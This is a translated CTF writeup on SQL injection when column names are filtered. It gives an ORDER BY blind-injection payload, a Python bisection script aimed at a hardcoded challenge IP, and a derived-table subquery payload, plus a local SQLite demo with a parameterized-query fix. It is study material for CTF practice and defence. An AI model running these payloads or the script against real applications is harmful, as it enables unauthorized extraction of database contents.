Two tricks for extracting data by injection when column names are blocked

Author: rivir | Source: published 2017-12-02 13:13, read 31 times

    The LCTF challenge "他们有什么秘密呢" ("What secrets do they have?") was one I did not solve myself, but reading the writeups of the top players taught me a lot, so I have collected their approaches here for reference.

    The challenge had plenty of pitfalls. Extracting the table name and column names through error-based injection is a worthwhile topic in its own right but is left aside here; what follows are two tricks for extracting data by injection when column names are blocked.

    1. order by blind injection

    payload:

    union select 1,2,3,0x{} order by 4%23
    

    0x{} is where our payload goes. The idea is to use ORDER BY to make the database compare the fourth column of the real row against our payload as strings; which row sorts first is visible in the response, giving a blind-injection oracle. The script is as follows:

    #!/usr/bin/env python3
    # coding: utf-8
    import requests
    
    url = "http://182.254.246.93/entrance.php"
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'}
    # Candidate characters as two-digit hex, covering ASCII 0x20..0x7F in
    # ascending order (the binary search below relies on the list being sorted).
    hex_s = ['%02X' % c for c in range(0x20, 0x80)]
    old_char = ''  # hex of the characters recovered so far
    # The injected row (1,2,3,<guess>) is sorted against the real row on column 4;
    # binary() forces a byte-wise comparison instead of a collation-dependent one.
    payload = "3 union select 1,2,3,binary(0x{}) order by 4"
    
    def access(p):
        """Return True when the guessed prefix sorts before the real value,
        i.e. when the injected row is the one displayed (its second column is 2)."""
        param = payload.format(old_char + p)
        data = {'pro_id': param}
        res = requests.post(url, data=data, headers=headers).text
        return ':2' in res
    
    def erfen():
        """Binary-search one character at a time (erfen = bisection)."""
        global old_char
        for _ in hex_s:  # bounds the number of characters recovered
            l = 0
            r = len(hex_s)
            while l < r:
                mid = (l + r) // 2
                if access(hex_s[mid]):
                    l = mid + 1
                else:
                    r = mid
            # hex_s[l-1] is the largest candidate that still sorts before the real value
            old_char += hex_s[l - 1]
            if l > 94:
                # every candidate sorted before the real value: the string is exhausted,
                # so drop the meaningless byte that was just appended
                return bytes.fromhex(old_char[:-2]).decode('latin-1')
            print('data => ', bytes.fromhex(old_char).decode('latin-1'))
    
    if __name__ == '__main__':
        s = erfen()
        # the search yields the greatest character that sorts strictly before the
        # true one, so the final character comes out one below the real value
        print('flag:', s[:-1] + chr(ord(s[-1]) + 1))
    

    2. Subquery

    payload:

    pro_id=-1 union select 1,(select e.4 from (select * from (select 1,2,3,4)c union select * from product_2017ctf limit 1 offset 3)e),3,4
    

    (select e.4 from (select * from (select 1,2,3,4)c union select * from product_2017ctf limit 1 offset 3)e) // e.1, e.2 and e.3 likewise return the first, second and third columns. The union with the derived table (select 1,2,3,4)c gives the combined result set the column names 1, 2, 3 and 4, so the real table's columns can be addressed as e.1 ... e.4 without ever naming them; limit 1 offset 3 then picks a single row of that combined result.

    Once the value has been selected this way, a union select places it into a displayed column. The method is simple, but it is also easy to block; the WAF in this challenge filtered only a few keywords, which is why the data could be extracted like this.
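    To make the mechanism behind trick 1 visible without a live target, and to show the fix that removes both tricks at once, here is an added example (not part of the writeup) that reproduces the ORDER BY oracle against a constructed SQLite table; the table, its column names c1..c4 and the value flag{demo} are made up for the demonstration, and the parameterized lookup is the hardened counterpart of the string-concatenated query.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the challenge table (column names are ours)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE product_2017ctf (c1 INTEGER, c2 TEXT, c3 TEXT, c4 TEXT)")
    con.executemany("INSERT INTO product_2017ctf VALUES (?,?,?,?)",
                    [(1, "a", "x", "-"), (2, "b", "y", "-"), (3, "c", "z", "flag{demo}")])
    return con

def lookup_vulnerable(con, pro_id):
    """String concatenation: whatever pro_id contains is parsed as SQL."""
    sql = "SELECT c1,c2,c3,c4 FROM product_2017ctf WHERE c1=%s LIMIT 1" % pro_id
    return con.execute(sql).fetchone()

def lookup_safe(con, pro_id):
    """Bound parameter: pro_id is only ever a value, never SQL text, so a
    non-numeric pro_id simply matches no row."""
    sql = "SELECT c1,c2,c3,c4 FROM product_2017ctf WHERE c1=? LIMIT 1"
    return con.execute(sql, (pro_id,)).fetchone()

def order_by_oracle(con, guess):
    """The writeup's oracle reproduced locally: the injected row (1,2,3,<guess>)
    is sorted against the real row on column 4 and LIMIT 1 shows the winner.
    X'..' hex stands in for the writeup's 0x literal; CAST(... AS TEXT) keeps
    the comparison byte-wise (an uncast BLOB always sorts after TEXT in SQLite)."""
    hexed = guess.encode().hex()
    injected = "3 UNION SELECT 1,2,3,CAST(X'%s' AS TEXT) ORDER BY 4" % hexed
    row = lookup_vulnerable(con, injected)
    return row[1] == 2  # the second column is the integer 2 only on the injected row

if __name__ == "__main__":
    con = make_db()
    # A true prefix sorts before the full value (the shorter string wins) ...
    print(order_by_oracle(con, "flag{dem"))     # True
    # ... but once the whole value has been matched, any extra byte sorts after
    # it (and an exact tie is DBMS-dependent), which is why the writeup's script
    # stops when every candidate passes and bumps the last character by one.
    print(order_by_oracle(con, "flag{demo}!"))  # False
    # With a bound parameter the same text is just an unmatched value.
    print(lookup_safe(con, "3 UNION SELECT 1,2,3,4 ORDER BY 4"))  # None
    print(lookup_safe(con, 3))  # (3, 'c', 'z', 'flag{demo}')
```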

        Article link: https://www.haomeiwen.com/subject/nsdnbxtx.html